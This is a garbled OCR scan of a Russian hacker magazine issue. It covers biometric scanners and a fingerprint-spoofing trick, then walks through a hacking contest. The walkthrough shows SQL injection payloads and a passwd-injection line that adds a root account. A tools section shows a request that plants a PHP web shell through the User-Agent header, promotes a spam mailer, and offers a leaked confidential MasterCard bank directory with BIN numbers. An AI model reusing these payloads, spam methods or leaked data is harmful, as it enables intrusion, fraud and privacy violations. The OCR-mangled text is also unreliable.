внутренним отражением. Но при контакте 
более плотной оптической среды (в нашем 
случае поверхность пальца) с менее плотной 
(в практической реализации, как правило, по- 
верхность призмы) вточке полного внутренне- 
го отражения пучок света проходит через эту 
границу. Таким образом, от границы отразят- 
ся только пучки света, попавшие в такие точки 
полного внутреннего отражения, к которым не 
были приложены бороздки папиллярного узо- 
ра поверхности пальца (это маленькие линии 
на подушечках пальцев). Для фиксации полу- 
чившейся таким образом световой картинки 
поверхности пальца используется специаль- 
ная камера (ПЗС или КМОП в зависимости от 
реализации сканера). 

2. Оптоволоконные сканеры (ЯЬег орйс 
зсаппегз) представляют собой оптоволо- 
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ЕТ-ВМЗЗО - сканер 
радужной оболочки глаз 
от Рапазопіс 



конную матрицу, каждое из волокон которой 
заканчивается фотоэлементом. Чувстви- 
тельность каждого фотоэлемента позволяет 
фиксировать остаточный свет, проходящий 
через палец, в точке прикосновения рельефа 
пальца к поверхности сканера. Изображение 
отпечатка пальца формируется по данным 
каждого из элементов. 

3. Электрооптические сканеры (еіесіго-оріі- 
саі зсаппегз). В основе данной технологии ле- 
жит использование специального электрооп- 
тического полимера, в состав которого входит 
светоизлучающий слой. При прикладывании 
пальца к сканеру неоднородность электри- 
ческого поля у его поверхности (разность по- 
тенциалов между бугорками и впадинами) от- 
ражается на свечении этого слоя так, что он 
высвечивает отпечаток пальца. Затем массив 
фотодиодов сканера преобразует это свече- 
ние в цифровой вид. 

4 . Оптические протяжные сканеры (зѵѵеер 
орйсаі зсаппегз) похожи на РТІВ-устройства, 
но их отличие заключается в том, что палец 
нужно не просто прикладывать к сканеру, а 
проводить им по узкой полоске — считыва- 
телю. При движении пальца по поверхности 
сканера делается серия мгновенных снимков 
(кадров). При этом соседние кадры снимаются 
с некоторым наложением, то есть перекрывают 
друг друга, что позволяет уменьшить размеры 
используемой призмы и самого сканера. Для 
склейки серии фотографий и формирования 
целостного узора применяется ПО, часто вши- 
тое в сканер. 

5 . Роликовые сканеры (гоііег-зіуіе зсаппегз). 
В этих небольших устройствах сканирование 
пальца происходит при прокатывании пальцем 
прозрачного тонкостенного вращающегося 
цилиндра (ролика). Дальше идет процесс, ана- 
логичный пункту 4. При сканировании исполь- 
зуется простейшая оптическая технология: 
внутри прозрачного цилиндрического ролика 
находятся статический источник света, линза и 
миниатюрная камера. 



6. Бесконтактные сканеры (іоисИІезз зса- 
ппегз). В этом случае не требуется непос- 
редственного контакта пальца с поверх- 
ностью сканирующего устройства. Палец 
прикладывается к отверстию в сканере, 
несколько источников света подсвечивают 
его снизу с разных сторон, в центре сканера 
находится линза, через которую собранная 
информация проецируется на КМОП-камеру, 
преобразующую полученные данные в изоб- 
ражение отпечатка пальца. 

Сейчас на рынке появилось очень много уст- 
ройств с встроенными сканерами отпечатков 
пальцев. Мышки, сотовые телефоны, ноутбу- 
ки... осталось, наверное, только зажигалки 
снабдить этой высокой технологией :). Япон- 
ский ученый Мацумото со свистом похачил 
это дело следующим образом: сначала на по- 
верхность сканера подаются пары китайского 
суперклея (забыл его химическое название). 

Под действием паров на поверхности проявят- 
ся паппилярные узоры, оставшиеся от преды- 
дущей авторизации. После на эти белесые 
узоры аккуратно наклеивается скотч, также 
нежно отдирается, захватывая с собой узоры, 

— и вуаля. Можно прикладывать эту полоску, 
накрыв ее собственным пальцем, — и ты про- 
никнешь в женскую раздевалку. 

Ты, наверное, смотрел трэшевые боевики, 
где братва лихо отрубает палец жертве и по- 
том спокойно авторизуется. Да, такая фиш- 
ка действительно прокатит, но нужно отме- 
тить, что пока был зарегистрирован только 
один случай такого беспредела, и, кроме 
этого, теперь стали использовать вместе со 
сканерами отпечатков еще и анализаторы 
голоса, так что теперь, если ты станешь бан- 
киром и тебя захотят кинуть, ты все равно 
сможешь играть в ѴѴ:РТ :). Нужно отметить, 
что есть один прикольный недостаток: ска- 
нер отпечатков паль- 
цев не работает, если Именно такой отпечаток 
руки пользователя проецируется на сканере :) 
слишком чистые :). По- 



этому для достижения эффекта потри себе 
нос или лоб. 

О Г лаза — зеркало души 

У человеческого глаза есть две уникальные 
для каждого человека характеристики: сет- 
чатка и радужная оболочка. Первую для пос- 
троения биометрических систем обеспечения 
информационной безопасности используют 
уже давно. В этих системах сканер определя- 
ет либо рисунок кровеносных сосудов глаз- 
ного дна, либо отражающие и поглощающие 
характеристики самой сетчатки. Обе эти тех- 
нологии считаются самыми надежными среди 
биометрических. Сетчатку невозможно подде- 
лать, ее нельзя сфотографировать или снять 
откуда-нибудь, как отпечаток пальца. Правда, 
недостатков у систем, работающих с сетчат- 
кой глаза, более чем достаточно. Во-первых, 
это высокая стоимость сканеров и их большие 
габариты. Во-вторых, анализ полученного 
изображения занимает не менее одной мину- 
ты. Т ретий недостаток — неприятная для чело- 
века процедура сканирования. Дело в том, что 
пользователь должен во время этого процесса 
смотреть в определенную точку, при этом осу- 
ществляется инфракрасное сканирование, 
из-за чего юзер испытывает покалывание или 
жжение в глазах. Ну и последний недостаток 
использования сетчатки глаза в биометрии 
— значительное ухудшение качества снимка 
при некоторых заболеваниях, например, при 
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катаракте. А это значит, что люди с плохим 
зрением не смогут воспользоваться этой тех- 
нологией. Недостатки идентификации чело- 
века по сетчатке глаза привели к тому, что эта 
технология плохо подходит для использова- 
ния в системах защиты информации. Поэтому 
наибольшее распространение она получила 
в системах доступа на секретные научные и 
военные объекты. 

По-другому обстоят дела с системами, ис- 
пользующими для идентификации радужную 
оболочку глаза. Для работы нужно только 
специальное программное обеспечение и 
камера. Принцип работы таких систем очень 
прост. Камера снимает лицо человека. Про- 
грамма из полученного изображения выде- 
ляет радужную оболочку. Затем по опреде- 
ленному алгоритму строится цифровой код, 



по которому и осуществляется идентифика- 
ция. У такого решения немало достоинств. 
Во-первых, небольшая цена. Во-вторых, 
ослабленное зрение не препятствует скани- 
рованию и кодированию идентифицирующих 
параметров. В-третьих, камера не доставля- 
ет никаких проблем юзерам. 

Здесь уже подделать что-то намного слож- 
нее, так как не остается никаких следов на 
сенсорах (в отличие от сканеров отпечатков 
пальцев). У тебя есть одна возможность: под- 
караулить где-нибудь человека, имеющего до- 
ступ к сканеру, выскочить из-за угла и громко 
крикнуть «БУ!». Быстро фотографируешь его 
широко открытые глаза и потом демонстриру- 
ешь сканеру. Устройство умирает от смеха и 
открывает тебе дверь :). На самом деле пока 
что способов обхода сканеров радужной обо- 
лочки глаз не придумали. Теперь поговорим 
об аппаратной части. Признанным игроком 
на данном рынке является японская компания 
Рапазопіс с устройством ВМ-ЕТЗЗО. Этот де- 
вайс требует, кроме авторизации сканиро- 
ванием, еще и смарт-карту, с которой срав- 
ниваются данные, полученные в результате 
сканирования. Атеперь представь такую ситу- 
ацию: ученый заходит в здание, а смарт-карта 
имеется только у начальника безопасности. 
Ученый подходит, проходит сканирование, на- 
чальник безопасности верифицирует его визу- 
ально, а уже потом с помощью карточки. Если 
бы это применялось в играх, думаю, многие сю- 
жеты потекли бы в другом направлении... При- 
мерно так это выглядит в реале. Далее скорость 
идентификации равна 1 секунде. Когда оба гла- 
за отражены в зеркале, система автоматичес- 
ки фиксирует рисунок радужки 
и заканчивает распознавание в 
течение 1 секунды. По сравне- 
нию с предыдущими аппарата- 
ми это намного быстрее. Теперь 
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перейдем к надежности: ошибка определения 
1 к 1 .2 миллионам. Распознавание по радужке 
использует индивидуальные различия, най- 
денные в образце радужной оболочки глаза. 
Вероятность ошибочной идентификации од- 
ного индивидуума, как другого, практически 
равна 0. Представь, что зрители 12 стадионов 
«Олимпийский» разом решили тебе помочь 
открыть дверь. Перед глазами картина: кило- 
метры очереди, горят баки с мусором, возле 
двери очередной неудачник пытается авто- 
ризоваться, звучат команда голосового на- 
ведения системы «Левее — Ниже». Пип-пип. 
«Отказано в доступе». И следующий лезет на 
пьедестал. Короче, без шансов. Поможетуни- 
версальная отмычка для дверей РПГ-7 :). Из- 
начально система поставляется на 25 пользо- 
вателей, однако, приобретая дополнительные 
пользовательские лицензии, их легко можно 
нарастить до 5000 пользователей. НС 
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ДЕЛА ЖИТЕЙСКИЕ 



Если ты думаешь, что биометрия — только для 
гниющего Запада и тебя коснется нескоро, то 
ты ошибаешься. Калининградская область, 
по замыслу федерального правительства, 
должна будет стать одним из пионеров сов- 
ременной паспортизации. В конце января там 
с помпой прошла презентация заграничного 
паспорта нового образца — с биометричес- 
кими данными. Нужно отметить, что биомет- 
рическим его можно назвать с натяжкой: там 
будет лишь цифровая фотография и элект- 
ронная подпись владельца, но это только пер- 
вая ласточка. 

Жители остальной части России смогут пе- 
рейти на биометрию только в 2007 году. А ре- 
шение о выдаче новых паспортов — в первую 
очередь, именно в Калининградской области 
— обусловлено территориальной отдален- 
ностью этого региона от основной части 
России. Самый западный субъект России на- 
ходится в окружении стран Европейского со- 
юза, где с биометрией уже «подружились». 
Государственная пошлина на заграничный 
паспорт нового образца составляет 1 000 руб- 
лей для взрослых и 500 рублей для детей. При 
этом жители Калининграда и области платить 



ничего не будут — все затраты компенсируют- 
ся из федерального бюджета. Вот так вот. А 
теперь давай я тебя немного посмешу и рас- 
скажу тебе, до чего додумались американцы. 
Вот тебе цитата из новостей их «хай-тека» : 
«Ученые Массачусетского технологическо- 
го института (МП), проводившие исследо- 
вания по заказу агентства ОАРРА, пришли 
к сенсационным результатам, которые поз- 
воляют перейти на совершенно другой уро- 
вень безопасности. 

Министерство обороны США в рамках усиле- 
ния защиты своих ресурсов поручило ОАВРА 
провести анализ существующих методов 
биометрической аутентификации и предло- 
жить что-то новое и надежное. МП Віотеігіс 
І_аЬога{огу, досконально изучив данный воп- 
рос, помимо таких традиционных иденти- 
фикаторов человека, как отпечаток пальца 
руки, сетчатка глаза, голос, геометрия руки и 
почерк, обратила внимание и на другие части 
тела, которые могли послужить целям безот- 
казной идентификации». 

К удивлению ученых, такие части нашлись: 
ими оказались ушные раковины человека и 
его первичные половые признаки. Последняя 



Радужная оболочка глаза 



часть тела, правда, помогает идентифициро- 
вать только мужчин, так как анатомия женщин 
не позволяют создать прибор, замеряющий 
такназываемыебиометрическиеконтрольные 
точки, используемые при аутентификации. 
Однако высокие чины Пентагона, изучившие 
результаты исследований, не придают этому 
большого значения. «Большинство наших 
сотрудников — это мужчины. Поэтому для нас 
очень интересны и важны полученные резуль- 
таты», — заметил высокопоставленный офи- 
цер Министерства обороны, участвовавший 
в приемке работ. «А стыдливым — не место 
среди военных, особенно когда дело касается 
национальной безопасности». 

Полученными учеными результатами уже за- 
интересовался ряд правоохранительных и си- 
ловых структур США и Западной Европы, так 
как данные о биометрических человеческих 
признаках с успехом могут быть применены 
и в криминалистике для идентификации пре- 
ступников. 

Однако нашлись и скептики, считающие, что 
на пути данной технологии, помимо врожден- 
ной человеческой стыдливости, стоит ряд 
труднопреодолимых препятствий. Напри- 
мер, постоянная изменчивость формы био- 
метрического параметра под влиянием ряда 
внешних, трудноконтролируемых факторов. 
Вторая проблема, с которой могут столк- 
нуться разработчики, — создание прибора, 
аналогичного сканеру сетчатки глаза или от- 
печатков пальцев. Однако авторы технологии 
считают, что все эти недостатки преодолимы. 
Вот так вот американцы покрывают себя веч- 
ной славой... Интересно, как молоденький 
сержант будет проходить авторизацию в по- 
сольстве, побывав на московском морозе? 



> Каталог Рапазопіс 
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О Объявление. 

Уважаемые товарищи хакеры! Компьютеры 
нашей всем известной фирмы «Ромашка», 
уже долго производящей превосходные удоб- 
рения и аграрные смеси, атакуются вирусами 
завистливых конкурентов. Из-за этого мы тер- 
пим огромные убытки, так как наши сотрудни- 
ки очень боятся вирусов и отказываются ра- 
ботать. Мы подозреваем фирму «Одуванчик», 
ибо странные вещи с компьютерами проис- 
ходят после скачивания игр с их Йр-сервера 
копкигз.хакер.ги . Но, к сожалению, у нас нет 
доказательств, и, если вы сможете их раздо- 
быть, мы будем бесконечно вам благодарны. 
Бабаева Роза Васильевна, Директор фирмы 
«Ромашка». 

Это объявление мы нашли настолбе недалеко 
от редакции и решили помочь всеми любимой 
фирме «Ромашка». Поэтому, если найдешь 
доказательства первым, получишь презент 
от редакции . Подумай, ведь настоящий хакер 
всегда придет на помощь производителям 
удобрений, ибо удобрение есть не что иное, 
как двигатель аграрного дела. 

□ Предыдущий конкурс. 

Вот как надо было проходить предыдущий 
конкурс. 

X Уровень 1 ВвломрЬрВВ. 

За завышенной версией рбрВВ маскируется 
старенький рНрВВ 2.0.8. Юзая баг, описан- 
ный на Ийр://зесигіІуІаЬ.ги/ѵиІпегаЫІіІу/203294. 
рНр?рІіга5е ісІ=38483 . можно легко получить 
хэши паролей. Один из хэшей администрато- 
ров брутится довольно быстро, а вот с други- 
ми возникают проблемы. Но нам будет доста- 
точно одного пароля. 

X Уровень 2 30І_-инъекции. 



каунта: долларовый и рублевый. Затем нужно 
было переводить с долларового аккаунта на 
рублевый по $ 0 , 1 . Работает это так: сначала 
$0,1 домножается на курс доллара и получает- 
ся 2,7 рубля. Потом все это дело округляется 
по дробной части, вычитается из счета одного 
и добавляется к счету другого аккаунта. Таким 
образом, из долларового счета уйдет $0, а в 
рублевый счет придет 2 рубля. Если повторять 
такую операцию много раз, то денег хватит, 
чтобы купить стелс-систему. 

X Уровень 4 Му5ці|_. 

В награду за работу тебе дают возможность 
отправить сообщение в космос. Для того что- 
бы написать сообщение, нужно зайти через 
ззН с выданным логином и паролем, а дальше 
ввести подаренный таким же образом пароль 
отБД. Но,кромеоднойтаблицы,тыненайдешь 
ничего интересного. Котяра здесь зарыта вот 
где. В первом уровне через тот же самый баг 
можно было прочесть хэши из таблицы тузці. 
изег. Единственный брутабельный хэш при- 
надлежит юзеру ззбизегз. Вводишь вместо 
подаренных никчемных данных для доступа 
ззбизегз взбрученный пароль — и получаешь 
доступ к таблице с паролями некоторых юзе- 
ров системы, из которых наибольший интерес 
представляет гедег. 

X Уровень 5 Рутим. 

Когдазаходишь гедег’ом через ззб, запускает- 
ся прога-регистратор новых юзеров. Причем 
прога устроенатак, что сначала она делает ко- 
пию /еіс/тазіег.раззѵѵсі, добавляет в нее новые 
данные и натравливает на копию рѵѵсЦтіксІЬ с 
флагом -р. Проблема этой проги заключается 
в том, что данные совершенно не фильтруют- 
ся на спецсимволы. Если ввести юзернеймом 



мешают запуску спутника на орбиту. Для это- 
го нужно взломать сайты обеих организаций 
и получить доступы к администрированию 
новостей на каждом сайте. В новостях сле- 
дует написать, что в этот день будет сбор на 
Красной площади. И, по идеи, после этих ма- 
нипуляций ребята обоих команд соберутся на 
Красной площади и нарвутся друг на друга. 
Начнется разборка, во время которой можно 
будет без проблем запустить спутник. 

С сайтом любителей чистоты все просто. Сна- 
чала заходишь в /абтіп, там тебе предлагают 
ввести логин и пароль. Естественно, сама со- 
бой напрашивается ЗОБ-инъекция, но данные 
с формы передаются сначала скрипту безо- 
пасности, который добавляет все необходи- 
мые слэши и передает их скрипту входа. Если 
логин/пароль не подходят, то скрипт входа пе- 
ребрасывает нас по Ыббеп-параметру гесііг, 
поменяв который на пустоту, мы вычислим 
скрипт входа и сможем указать в параметрах 
опасные данные: 



У любителей животных сайт будет покрепче, 
но тоже достаточно просто рушится под на- 
тиском хакерской смекалки. Здесь также за- 
ходим в /абтіп. Но теперь в форме, кроме ло- 
гина и пароля, нам предлагают ввести группу. 
На самом деле устроено так, что группа — это 
таблица в БД, и поэтому, если подобрать су- 
ществующую группу, мысленно представив 
запрос, можно было проделать ЗОБ-инъек- 
цию. Проще всего подобрать группу абтіпз. 
Для инъекции достаточно ввести группу 
«ипіоп зеіесі разз, Іодіп Ігот абтіпз» и полу- 
чить список, вначале которого идут логины, а 
затем — пароли. 



Полученный в первом уровне логин-пароль 
вводишь в свой почтовый клиент и коннек- 
тишься им на копкигз.хакер.ги . Тебе на почту 
приходит инструкция о том, что надо натра- 
вить друг на друга две организации, которые 
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X Уровень 3 Баг в округлениях. 

В том же письме указывалось, что надо ук- 
расть из интернет-магазина стелс-систему. 
Для взлома достаточно было завести два ак- 



гооіу:Ѵ8МЭ9біСѵНИРк:0:0::0:0:гооіу:/гооБ/Ьіпу 



то получим аккаунт гооіу с абсолютными пра- 
вами и известным паролем. 30 








Серверы, которые знают свою работу 





Добейтесь экономии времени и сократите 
операционные расходы, используя сервера «Х-Сот» 
на базе двухъядерных процессоров Іпіеі® Хеоп®. 




Хеоп* 

/л 5/с/е™ 

Два ядра. 
Делай больше. 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо І_одо, Соге Іпзісіе, ІпТеІ, Іпіеі І_одо, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе І_одо, Іпіеі БреесІБіер, Іпіеі Ѵііѵ, ІТапіит, ІТапіит Іпзісіе, РепНіит, Репііит Іпзісіе, Хеоп 
и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 



ЗАО «Икс-ком. ру» 

Центральный офис 

1 251 67, г. Москва, Ленинградский проспект, дом 56/2 
(495)7-999-600, (495)151-23-23, (495)152-33-94 (факс) 
8-800-200-0069 (для регионов) 
мѵѵѵ/.хсот.ш, е-таіі: рт@хсот.пі 



Интернет-лдагазин Санкт-Петербургское отделение 

ѵѵѵѵѵ/.хсот-зГіор.ш 196084, г. Санкт-Петербург, 

телефон: (495)799-96-69 Московский проспект, дом 129 

е-таіі: ѵаІ@хсот.ш Телефон: (812) 388-29-09, (812)740-11-10 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 



▼ ПРОГРАММА: 8КѴПЕТ МАІІ.ЕП VI .6 
ОС: ѴѴІЫООѴѴ8 2000/Х Р 
АВТОР: 8КѴЫЕТ 80ГТѴѴАПЕ 
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> Пожалуй, лучшее средство для спам-рассылок 

Как известно, спам — очень прибыльный биз- 
нес. Поэтому хороший софт стоит немалых де- 
нег. Существует несколько распространенных 
способов рассылки спама: 

1 . Директ-рассылки. 

Спам через соксы. 

3. Ботнет. 

В первом случае используют взломанные сер- 
веры, с которых запускают прямую рассылку. 
Во втором — купленные дедики с установлен- 
ным спам-софтом, посылаемые через соксы. 
Ну а в третьем — спам осуществляется при 
помощи ботнета. ЗкуЫеі Маііег ботнет тебе 



создать не поможет, так что расслабься и 
слушай дальше. Программа предназначена 
для рассылки писем с твоего компьютера и 
обладает огромным количеством настроек 
и полезных прибамбасов. Признаюсь, что 
после первого запуска софтины я некоторое 
время пребывал в состоянии ступора, нахо- 
дясь под впечатлением увиденного. Но обо 
всем по порядку. Для начала тебе необхо- 
димо проследовать на сайт ЗкуЫеі ЗоІІѵѵаге 
( МрѴ/зкѵпеЫаЬогаІогѵ.сот ) и зарегистри- 
роваться. В данный момент регистрация бес- 
платная, так что спеши (как стало известно, 
бесплатный период продлится до конца года. 
— Прим. ред.). После этого слей себе на винт 
программу с нашего диска и установи ее. За- 
пустив тулзу, ты увидишь форму для логина. 
Смело вбивай в нее данные своего аккаунта 
с сайта ЗкуЫеІ ЗоІІѵѵаге и жми «І_одіп». Далее 
прога осуществит подключение к серверу 
для авторизации и проверки обновлений. 
Если все прошло успешно — программазагру- 
зится, и перед тобой предстанет главное окно 
тулзы, в котором следует заполнить фейко- 
вый адрес отправителя, текст письма, а так- 
же прикрепить аттач. На следующей вкладке 
нужно указать спам-лист и при необходимос- 
ти прокси. В принципе, этих настроек вполне 
достаточно, так что можножать кнопку «Пип», 
но не будем торопиться. Софтина позволяет 
изменять хидеры письма, время таймаута, 
количество потоков соединений и еще много 
чего. Описать все возможности программы в 
одном выпуске Х-Тооіз просто невозможно, по- 
этому советую запастись терпением и изучить 
настройки тулзы самостоятельно. 



▼ ПРОГРАММА: ПАѴѴ НТТР ВЕ0ШЕ8Т 
ОС: ѴѴІЫООѴѴ8 2000/Х Р 
АВТОР: КЮ_ВОСК 






> Хитрый ѴѴеЬ-шелл, обходящий все файрволы 

Очередной релиз от небезызвестной ИОІсІ-ир- 
іеат. Программа представляет собой пакет- 
ный сендер, работающий с 80-м портом сер- 
вера. Ты можешь возразить — мол, подобного 
софта полно в сети — и будешь не прав. Эта 
софтина не просто шлет пакеты. Она посылает 
запрос для заливки веб-шелла на бажный сайт. 
Представь ситуацию: ты нашел уязвимый перл- 
скрипт и можешь выполнять произвольные 
команды на сервере, но залить шелл не полу- 
чается (соединения блокирует файр, скрипт 
фильтрует некоторые символы и т.д.). Именно 
тогда на помощь тебе придет Наѵѵ НТТР гециезі. 
Прога отправит хитрый пакет, который создаст 
на сервере файл и пропишет в него простой 
рИр-зИеІІ, благодаря чему ты сможешь закре- 
питься на атакуемом ресурсе и в дальнейшем 
исследовать содержимое сервера. От тебя 



взлом 



ТРОИКОВ ЛЕОНИД 









требуется лишь указать путь к бажному скрип- 
ту, доступную на запись веб-директорию и ІІРІ_ 
сайта. Изначальная конфигурация софтины 
выглядит так: 



ОЕТ/5Гіоріпд/ѵѵгі1еГі1тІ.сді?5Іс1=..92Ро^еІо5\л/&ЛІеМат| 
е=ІѳсГіо%20$НТТР_ Ц5ЕН_А(ЗЕМТ%20>%20сагЮа1а/| 
зИ.рЕірІ Н ТТР/І.іД 

Нозі: зотезегѵег.сот 
Ызег-Адепі: <? зузіет(ОЕТ['стсГ]) ?> 



Как видишь, Раѵѵ НТТР гециезі использует ко- 
манду есЬо и данные клиента ($НТТР_ІІ5ЕВ_ 
АСЕІМТ), которые записываются в файл веб- 
шелла. Содержимое Ызег-Адепі ты можешь 
менять на свой выбор. Все зависит от твоей 
фантазии, а применение программа обяза- 
тельно найдет. Например, всем известный регі 
зЬор не позволяет через свой баг пользоваться 
качалками, ругаясь на отсутствие открываемо- 
го файла. В этом случае стоит воспользоваться 
Раѵѵ НТТР гециезі и не усложнять себе жизнь. 
Кстати, ребята из ИОІб-ир-іеат любезно предо- 
ставили сорцы программы, так что пользуйся на 
здоровье. 

▼ ПРОГРАММА: РНР2ЕХЕ 
ОС: ѴѴІЫООѴѴ8 2000/Х Р 
АВТОР: ВЦС(0)В 



> Превратим любой скрипт в исполняемый 
бинарник 

Возможно, ты уже знаком с программой 
регІ2ехе, конвертирующей перл-скрипты в пол- 
ноценные ехе-приложения. Сегодня хочу пред- 
ставить тебе ее собрата — утилиту рЬр2ехе, 
конвертирующую рЬр-скрипты в исполняемые 
ехе-файлы. Я долго искал подобную тулзу, и 
не так давно один из моих знакомых кинул мне 
свежий релиз. Запустив рЬр2ехе и оценив воз- 
можности проги, я остался доволен. Тулза от- 
лично справляется со своей главной задачей 
— конвертированием рЬр-скриптавехе-файл. 
Кроме того, стоит отметить принцип работы 
софтины. Программа интегрирует скрипт в 
среду, то есть при выполнении сценарий не рас- 
паковывается на винт, а выполняется в памяти, 
как настоящая программа. Перед интеграцией 
скрипт зашифровывается, а перед выполне- 
нием расшифровывается, поэтому в какой-то 
мере это защищает от «крэкеров». Естествен- 



но, что для выполнения скрипта в папкес .ехе 
или в директории %ѴѴІМІ\ІТ%\зузІет32 должна 
лежать библиотека рЬр51з.сІІІ. 

Учитывай, что разработчики рЬр при переходе 
на новую ветку интерпретатора 5. 1 не удосужи- 
лись сохранить его совместимость со средой 

5.0. Поэтому конвертер предусматривает две 
версии — 5.0 и 5.1. Если ты конвертируешь в 

5.0, а твоя 01_1_ версии 5.1, то скрипт, увы, ра- 
ботать не будет. То же самое происходит, если 
конвертанешь скрипт для версии 5.1 и будешь 
запускать с версией рЬр51з.сІІІ 5.0. В случае, 
когда при выполнении скрипта появляются ле- 
вые ошибки, не связанные с самим сценарием, 
можно попробовать запустить скрипт следую- 
щим образом: 



|зсгір{.ехе -I 5сгірі.ехе| 



Такая ситуация происходит, например, в случае 
со следующим кодом: 




Тяісііотпр^ 

геіит ігіт(1 : деіз(ЗТОІМ)); 

$ір = іприІ(); 
есію ">> $ір\п"; 



г 

Также ты можешь упаковать скрипт с помощью 
протектора РЗО, для этого есть встроенная 
функция в рЬр2ехе. В общем, тулза — из раз- 
ряда Мизі Наѵе, и применение она обязательно 
найдет ! 

▼ ПРОГРАММА: МА8ТЕПСАПО МЕМВЕВ 
ОІВЕСТОВУ 

ОС: ѴѴІЫООѴѴ8 98/МЕ/2000/ХР 
АВТОР: МА8ТЕПСАГЮ ШТЕПМАТЮЫАІ. 




> Банковская инфа как на ладони! 



Перед тем как вести речь о данной тулзе, сле- 
дует упомянуть, что за ее использование в про- 
тивозаконных целях ответственность несешь 



ты. Программа содержит в себе базу данных, 
разработанную МазІегСагб и предназначен- 
ную исключительно для своих сотрудников. Как 
сказано в коротком мануале: «ТЬе іпіогтаііоп 
сопіаіпеб оп ІЬіз СО із ргоргіеіагу апб сопТісІепІіаІ 
Іо МазІегСагб Іпіегпаііопаі. ТЬіз таіегіаі тау поі 
Ье биріісаіеб, риЫізЬесІ, тосІіТіесІ, ог бізсіозеб, іп 
ѵѵбоіе ог іп рагі, ѵѵіІЬоиІ {Не ргіог ѵѵгіііеп регтіззіоп 
оі МазІегСагб Іп{егпа{іопаІ». Иными словами, за- 
прещено выкладывать программу в открытый 
доступ. Но для тебя я сделал исключение :). Так 
что поехали. 

Софтина состоит из двух частей: оболочки и 
самой базы. Причем есть возможность обнов- 
ления и модификации БД. Запустив программу, 
ты увидишь меню из четырех пунктов: МетЬег 
Іпіогтаііоп, Согрогаіе Оігесіогу, ѲеодгарНісаІ 
и Оаіа СНапде Рогт. Думаю, здесь все понят- 
но. Наибольший интерес представляет раз- 
дел МетЬег Іпіогтаііоп, в котором находится 
информация обо всех банках, работающих с 
МазІегСагб. Удобная система поиска по базе 
позволит тебе достаточно быстро найти необ- 
ходимые данные. Для примера я выбрал Нью- 
Йорк, введя в графу «5іаІе_Собе» значение 
« І\ІѴ » (по дефолту выборка происходит из спис- 
ка банков США, но можно указать конкретную 
страну). В результате я получил внушительный 
список, состоящий из названий банков. Выбрав 
СІТІВАЫК ЗОЫТН ОАКОТА, я перешел по вклад- 
кам программы, на которых обнаружил всевоз- 
можную информацию, начиная от контактных 
телефонов антифрод-отделов и заканчивая 
бинами. Кроме того, во вкладке ОіЬег был ука- 
зан максимальный размер кредита и ограни- 
чения по лимиту. Сами данные выглядяттак: 



Вапк: СІТІВАІ\ІКЗОІЛН ОАКОТА, Ы.А. 

Маіііпд Аббгезз: РО ВОХ 6000 ЗІОЦХ ЕА^5Р5^Ю00Д 
Зігееі Аббгезз: 399 РАВК АѴЕ ЫЕѴѴУОВК ЫУ 1 0022-461 4| 
Ноигз 01 Орегаііоп: ЕОВ АЦТНОВІ2АТІОМ5 АЫР| 
ВЕЕЕВВАЬЗ: 24 НОЦВЗ А РАУ, 7 РАУЗ А ѴѴЕЕКД 
СЕКІТВАІ_ РНОЫЕ: 0090 31 2 424 05 31 
СЕГ\ІТВАІ_ ЕАХ: 301-714-5740 
ІІ\ІТЕВМАТІОМАІ_ТЕІ_ЕХ: 295015 
ЦЭЗТ/ЗТОиЕЫ САВОЗ РНОЫЕ: 800-950-5114 
ВІЫ Іпіогтаііоп: 542379, 546294 

Оііпег Іпіогтаііоп: СОШЕСТЮЫ ІТЕМЗ ЫОТ АССЕРТЕР 
ЫШЕВ ЫЗР 25.00 ОРІ ОѴЕВ 1 ѴЕАРІ ОШ; ЫЗР 15.00 
НАМОиЫО РЕЕ; НІОНЕРі ЕЕЕЗ/ЫМІТЗ ВУ ОТНЕР 
МЕМВЕВЗ ѴѴІШ ВЕ РіЕСІРВОСАТЕО. СОІЧТАСТ: 800- 




Также рекомендую самостоятельно просмот- 
реть остальные пункты меню, благо програм- 
мисты из МазІегСагб написали неплохую обо- 
лочку для базы. 
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КОГДА Я БЫЛ МЕЛКИМ КАРАПУЗОМ, Я ЛЮБИЛ ЧИТАТЬ ВСЕ ПОДРЯД. ОСОБЕННЫЙ ИНТЕРЕС У МЕНЯ ВЫЗЫВАЛИ КНИЖ- 
КИ ИЗ СЕРИИ «ХОЧУ ВСЕ ЗНАТЬ», ТАК КАК Я МЕЧТАЛ СТАТЬ МЕЖГАЛАКТИЧЕСКИМ ДИКТАТОРОМ, А ДЛЯ ЭТОГО НУЖЕН 
БЫЛ НЕ АБЫ КАКОЙ ИНТЕЛЛЕКТ. ТАК ВОТ, ИНОГДА В ТЕХ САМЫХ КНИГАХ ПОПАДАЛИСЬ СТАТЬИ В ДУХЕ «ЗНАЕШЬ ЛИ ТЫ, 
ЧТО...», ГДЕ ПРИВОДИЛИСЬ ИНТЕРЕСНЫЕ ФАКТЫ НА САМЫЕ РАЗНООБРАЗНЫЕ ТЕМЫ. НАПРИМЕР, ТАКИЕ: «ЕСЛИ ЧЕЛО- 
ВЕК БУДЕТ МНОГО ПРЫГАТЬ, ТО ОБЯЗАТЕЛЬНО ВЫРАСТЕТ» ИЛИ «В КОСМОСЕ — 16 ТРИЛЛИАРДОВ ЗВЕЗД И ПЯТЬСОТ 
МИЛЛИОНОВ ГАЛАКТИК» . ТОЛЬКО ВОТ НЕ БЫЛО ТАМ КОМПЬЮТЕРНЫХ ФАКТОВ. КАК ТЫ УЖЕ ДОГАДАЛСЯ, Я ЗДЕСЬ, 
ЧТОБЫ ИСПРАВИТЬ ЭТО ДОСАДНОЕ УПУЩЕНИЕ. ПРОСВЕЩАЙСЯ, ЧУВАК! 



ЗНАЕШЬ ЛИ ТЫ, ЧТО... 



□ Технологии 

-> Современный РС имеет в 10 раз больше компьютерной мощности, 
чем потребовалось для отправления и посадки человека на Луну. 

1 024 Террабайта данных составляют 1 Петабайт. 

-► Впервые оборот продаж цифровых фотокамер превысил доходы 
производителей обычных фотоаппаратов в 2003 году. А в 2005 году но- 
утбуков было продано больше, чем настольных компьютеров — 53%. 

С 1 984 по 1 999 год в США было куплено больше персональных 
компьютеров, чем автомобилей. 

-> Раскладка клавиатуры ОѴѴЕВТѴ , возраст которой сейчас составля- 
